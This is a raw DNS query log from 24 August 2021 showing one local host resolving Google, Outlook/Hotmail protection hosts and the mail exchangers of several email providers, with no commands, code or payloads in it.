Aug 24, 2021 08:50:35.534651041 CEST	192.168.2.5	8.8.8.8	0xc7e1	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:35.633820057 CEST	192.168.2.5	8.8.8.8	0x30a5	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:35.693396091 CEST	192.168.2.5	8.8.8.8	0x8b8a	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:35.798140049 CEST	192.168.2.5	8.8.8.8	0x8ca5	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:36.012530088 CEST	192.168.2.5	8.8.8.8	0x259d	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:36.226320028 CEST	192.168.2.5	8.8.8.8	0x7990	Standard query (0)	msn-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:36.226341009 CEST	192.168.2.5	8.8.8.8	0x8761	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:36.484687090 CEST	192.168.2.5	8.8.8.8	0x3a9a	Standard query (0)	outlook-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:36.484719992 CEST	192.168.2.5	8.8.8.8	0xd6b8	Standard query (0)	www.google.fr	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:36.484726906 CEST	192.168.2.5	8.8.8.8	0xf8bf	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:36.665970087 CEST	192.168.2.5	8.8.8.8	0x7d59	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:36.856040955 CEST	192.168.2.5	8.8.8.8	0x6267	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:37.157428980 CEST	192.168.2.5	8.8.8.8	0x7c4b	Standard query (0)	msn-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:37.197433949 CEST	192.168.2.5	8.8.8.8	0xb3b5	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:37.402955055 CEST	192.168.2.5	8.8.8.8	0xa7a0	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:37.629743099 CEST	192.168.2.5	8.8.8.8	0xc6bd	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:37.711592913 CEST	192.168.2.5	8.8.8.8	0xab90	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:37.816807985 CEST	192.168.2.5	8.8.8.8	0xa7b9	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:37.874589920 CEST	192.168.2.5	8.8.8.8	0x5ba8	Standard query (0)	yopmail.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:37.967529058 CEST	192.168.2.5	8.8.8.8	0x3a5	Standard query (0)	smtp.yopmail.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:37.982805014 CEST	192.168.2.5	8.8.8.8	0xd2ae	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:38.121366024 CEST	192.168.2.5	8.8.8.8	0x5241	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:38.256477118 CEST	192.168.2.5	8.8.8.8	0x6f21	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:38.368125916 CEST	192.168.2.5	8.8.8.8	0xd834	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:38.557352066 CEST	192.168.2.5	8.8.8.8	0x44ca	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:38.576062918 CEST	192.168.2.5	8.8.8.8	0xbfd	Standard query (0)	mx3.qq.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:38.827568054 CEST	192.168.2.5	8.8.8.8	0xe44e	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:39.082673073 CEST	192.168.2.5	8.8.8.8	0x8fe9	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:39.272731066 CEST	192.168.2.5	8.8.8.8	0xf9c0	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:39.273247004 CEST	192.168.2.5	8.8.8.8	0x475c	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:39.501307964 CEST	192.168.2.5	8.8.8.8	0xe421	Standard query (0)	msn-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:39.501646042 CEST	192.168.2.5	8.8.8.8	0x6950	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:39.755686045 CEST	192.168.2.5	8.8.8.8	0xb9cb	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:40.034544945 CEST	192.168.2.5	8.8.8.8	0xb669	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:40.148189068 CEST	192.168.2.5	8.8.8.8	0x87f9	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:40.326544046 CEST	192.168.2.5	8.8.8.8	0xd871	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:40.443996906 CEST	192.168.2.5	8.8.8.8	0x332e	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:40.937634945 CEST	192.168.2.5	8.8.8.8	0x5e11	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:40.938416004 CEST	192.168.2.5	8.8.8.8	0xf66d	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:40.971956015 CEST	192.168.2.5	8.8.8.8	0x82e5	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:41.107162952 CEST	192.168.2.5	8.8.8.8	0x8dd0	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:41.262835026 CEST	192.168.2.5	8.8.8.8	0x108e	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:41.469037056 CEST	192.168.2.5	8.8.8.8	0x5563	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:41.488382101 CEST	192.168.2.5	8.8.8.8	0xd069	Standard query (0)	163.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:41.638618946 CEST	192.168.2.5	8.8.8.8	0xc1fa	Standard query (0)	163mx01.mxmail.netease.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:41.673382044 CEST	192.168.2.5	8.8.8.8	0xa8d7	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:42.417434931 CEST	192.168.2.5	8.8.8.8	0xa046	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:42.517242908 CEST	192.168.2.5	8.8.8.8	0x6b2c	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:42.549803019 CEST	192.168.2.5	8.8.8.8	0x23e8	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:42.604552984 CEST	192.168.2.5	8.8.8.8	0xd689	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:42.706449032 CEST	192.168.2.5	8.8.8.8	0x2c9a	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:43.115542889 CEST	192.168.2.5	8.8.8.8	0x78c2	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:44.381138086 CEST	192.168.2.5	8.8.8.8	0xe57b	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:44.381243944 CEST	192.168.2.5	8.8.8.8	0x78c2	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:44.664772034 CEST	192.168.2.5	8.8.8.8	0xeb07	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:44.666179895 CEST	192.168.2.5	8.8.8.8	0x670	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:44.969388962 CEST	192.168.2.5	8.8.8.8	0xaa6	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:45.088242054 CEST	192.168.2.5	8.8.8.8	0xff1c	Standard query (0)	msn-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:45.262898922 CEST	192.168.2.5	8.8.8.8	0x7042	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:45.479252100 CEST	192.168.2.5	8.8.8.8	0xadff	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:45.683912039 CEST	192.168.2.5	8.8.8.8	0x5b64	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:45.796402931 CEST	192.168.2.5	8.8.8.8	0xef15	Standard query (0)	live-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:45.952060938 CEST	192.168.2.5	8.8.8.8	0x1ef	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:46.040869951 CEST	192.168.2.5	8.8.8.8	0xee7	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:46.171343088 CEST	192.168.2.5	8.8.8.8	0x63c7	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:46.239006996 CEST	192.168.2.5	8.8.8.8	0x63fa	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:46.385284901 CEST	192.168.2.5	8.8.8.8	0x88cd	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:46.526756048 CEST	192.168.2.5	8.8.8.8	0xa069	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:46.672616005 CEST	192.168.2.5	8.8.8.8	0xdbbe	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:46.751758099 CEST	192.168.2.5	8.8.8.8	0x3182	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:46.814610004 CEST	192.168.2.5	8.8.8.8	0x56c5	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:46.817854881 CEST	192.168.2.5	8.8.8.8	0xc8c0	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:46.820250988 CEST	192.168.2.5	8.8.8.8	0x37b0	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.044411898 CEST	192.168.2.5	8.8.8.8	0x6bb2	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.044644117 CEST	192.168.2.5	8.8.8.8	0x74c7	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.060112000 CEST	192.168.2.5	8.8.8.8	0x865c	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.102274895 CEST	192.168.2.5	8.8.8.8	0xc706	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.205157042 CEST	192.168.2.5	8.8.8.8	0x583b	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.239658117 CEST	192.168.2.5	8.8.8.8	0x9e7c	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.270205021 CEST	192.168.2.5	8.8.8.8	0x5a74	Standard query (0)	naver.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:47.288330078 CEST	192.168.2.5	8.8.8.8	0x4ff6	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.334748030 CEST	192.168.2.5	8.8.8.8	0x680a	Standard query (0)	mx3.naver.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.336463928 CEST	192.168.2.5	8.8.8.8	0xbea5	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.337136030 CEST	192.168.2.5	8.8.8.8	0xa9f2	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.503272057 CEST	192.168.2.5	8.8.8.8	0xa6ec	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.568339109 CEST	192.168.2.5	8.8.8.8	0xb4c4	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.663434029 CEST	192.168.2.5	8.8.8.8	0xe5b5	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:47.703046083 CEST	192.168.2.5	8.8.8.8	0xbcf4	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:48.034344912 CEST	192.168.2.5	8.8.8.8	0x7446	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:48.182600021 CEST	192.168.2.5	8.8.8.8	0xb354	Standard query (0)	yabs.yandex.ru	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:48.266407967 CEST	192.168.2.5	8.8.8.8	0x35e7	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:48.270207882 CEST	192.168.2.5	8.8.8.8	0x2809	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:48.465672970 CEST	192.168.2.5	8.8.8.8	0xadfd	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:48.698364019 CEST	192.168.2.5	8.8.8.8	0x10c3	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:48.717617989 CEST	192.168.2.5	8.8.8.8	0xaf2b	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:48.898452044 CEST	192.168.2.5	8.8.8.8	0x6d0a	Standard query (0)	outlook-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:48.898621082 CEST	192.168.2.5	8.8.8.8	0xd4c4	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:49.106616020 CEST	192.168.2.5	8.8.8.8	0x8852	Standard query (0)	live-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:49.314182043 CEST	192.168.2.5	8.8.8.8	0xfdec	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:49.532576084 CEST	192.168.2.5	8.8.8.8	0xdc9	Standard query (0)	msn-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:49.671598911 CEST	192.168.2.5	8.8.8.8	0x3755	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:49.840672016 CEST	192.168.2.5	8.8.8.8	0x8895	Standard query (0)	qq.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:49.931909084 CEST	192.168.2.5	8.8.8.8	0xbb65	Standard query (0)	mx3.qq.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:49.932452917 CEST	192.168.2.5	8.8.8.8	0xad1b	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:49.932543039 CEST	192.168.2.5	8.8.8.8	0x5121	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:50.133924961 CEST	192.168.2.5	8.8.8.8	0x2ab2	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:50.691607952 CEST	192.168.2.5	8.8.8.8	0x3d1f	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:50.769092083 CEST	192.168.2.5	8.8.8.8	0x575	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:50.867628098 CEST	192.168.2.5	8.8.8.8	0x349d	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:50.971249104 CEST	192.168.2.5	8.8.8.8	0x2115	Standard query (0)	msn-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:50.985129118 CEST	192.168.2.5	8.8.8.8	0x1d76	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.135422945 CEST	192.168.2.5	8.8.8.8	0x7515	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.232356071 CEST	192.168.2.5	8.8.8.8	0x3a97	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.245460033 CEST	192.168.2.5	8.8.8.8	0x1927	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.283466101 CEST	192.168.2.5	8.8.8.8	0x82c8	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.345012903 CEST	192.168.2.5	8.8.8.8	0x8b72	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.428423882 CEST	192.168.2.5	8.8.8.8	0xa998	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.495171070 CEST	192.168.2.5	8.8.8.8	0x89a	Standard query (0)	msn-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.509479046 CEST	192.168.2.5	8.8.8.8	0x14a0	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.514127970 CEST	192.168.2.5	8.8.8.8	0xc873	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.574146032 CEST	192.168.2.5	8.8.8.8	0x23ef	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.624217987 CEST	192.168.2.5	8.8.8.8	0x8952	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.699341059 CEST	192.168.2.5	8.8.8.8	0x46ea	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.722165108 CEST	192.168.2.5	8.8.8.8	0xbff9	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.797396898 CEST	192.168.2.5	8.8.8.8	0xf1ad	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.884459019 CEST	192.168.2.5	8.8.8.8	0x8e1e	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:51.970747948 CEST	192.168.2.5	8.8.8.8	0xa32b	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:52.317636013 CEST	192.168.2.5	8.8.8.8	0x98d1	Standard query (0)	mx3.qq.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:52.505599022 CEST	192.168.2.5	8.8.8.8	0x139a	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:52.782088995 CEST	192.168.2.5	8.8.8.8	0xf143	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:52.787226915 CEST	192.168.2.5	8.8.8.8	0x7c3	Standard query (0)	msn-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:53.029735088 CEST	192.168.2.5	8.8.8.8	0x19f9	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:53.297087908 CEST	192.168.2.5	8.8.8.8	0x2fba	Standard query (0)	msn-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:53.305318117 CEST	192.168.2.5	8.8.8.8	0x5bb2	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:53.567866087 CEST	192.168.2.5	8.8.8.8	0x1400	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:53.655708075 CEST	192.168.2.5	8.8.8.8	0xb0ea	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:53.837614059 CEST	192.168.2.5	8.8.8.8	0xe0aa	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:53.878125906 CEST	192.168.2.5	8.8.8.8	0x6e08	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:54.263416052 CEST	192.168.2.5	8.8.8.8	0x9e53	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:54.334435940 CEST	192.168.2.5	8.8.8.8	0xbd46	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:54.416109085 CEST	192.168.2.5	8.8.8.8	0x1021	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:54.501785040 CEST	192.168.2.5	8.8.8.8	0xee72	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:54.549796104 CEST	192.168.2.5	8.8.8.8	0x4b6d	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:54.642529964 CEST	192.168.2.5	8.8.8.8	0x9a1d	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:54.643546104 CEST	192.168.2.5	8.8.8.8	0x5b64	Standard query (0)	hindholmsem.dk	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:54.924165010 CEST	192.168.2.5	8.8.8.8	0x9cd3	Standard query (0)	mail.happyisp.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:55.107502937 CEST	192.168.2.5	8.8.8.8	0x2dfa	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:55.386867046 CEST	192.168.2.5	8.8.8.8	0xc39d	Standard query (0)	live-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:55.387156963 CEST	192.168.2.5	8.8.8.8	0xa8a1	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:55.596642017 CEST	192.168.2.5	8.8.8.8	0x2173	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:55.805685043 CEST	192.168.2.5	8.8.8.8	0xe672	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:55.830532074 CEST	192.168.2.5	8.8.8.8	0x13b5	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.109888077 CEST	192.168.2.5	8.8.8.8	0x6bc1	Standard query (0)	live-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.168009996 CEST	192.168.2.5	8.8.8.8	0x9522	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.168531895 CEST	192.168.2.5	8.8.8.8	0xa266	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.435128927 CEST	192.168.2.5	8.8.8.8	0x7878	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.482614040 CEST	192.168.2.5	8.8.8.8	0x8854	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.532797098 CEST	192.168.2.5	8.8.8.8	0x3d52	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.572326899 CEST	192.168.2.5	8.8.8.8	0xd449	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.643341064 CEST	192.168.2.5	8.8.8.8	0x1e84	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.720854998 CEST	192.168.2.5	8.8.8.8	0x234e	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.731410027 CEST	192.168.2.5	8.8.8.8	0x3058	Standard query (0)	outlook-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.736763954 CEST	192.168.2.5	8.8.8.8	0x22b9	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.813963890 CEST	192.168.2.5	8.8.8.8	0x3d1c	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.873152018 CEST	192.168.2.5	8.8.8.8	0xfb87	Standard query (0)	ocps.net	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:56.937314987 CEST	192.168.2.5	8.8.8.8	0x17ab	Standard query (0)	mx1.ocps.net.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:56.990200996 CEST	192.168.2.5	8.8.8.8	0x9765	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:57.108047962 CEST	192.168.2.5	8.8.8.8	0xca5d	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:57.173196077 CEST	192.168.2.5	8.8.8.8	0x495f	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:57.268424034 CEST	192.168.2.5	8.8.8.8	0x14bc	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:57.340171099 CEST	192.168.2.5	8.8.8.8	0x23f2	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:57.359497070 CEST	192.168.2.5	8.8.8.8	0x59e1	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:57.411894083 CEST	192.168.2.5	8.8.8.8	0x4cd2	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:57.450592995 CEST	192.168.2.5	8.8.8.8	0xbf37	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:57.497172117 CEST	192.168.2.5	8.8.8.8	0x5ea7	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:57.778073072 CEST	192.168.2.5	8.8.8.8	0x45f4	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:57.799365044 CEST	192.168.2.5	8.8.8.8	0x324a	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:58.115684032 CEST	192.168.2.5	8.8.8.8	0xb450	Standard query (0)	outlook-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:58.134332895 CEST	192.168.2.5	8.8.8.8	0x20b	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
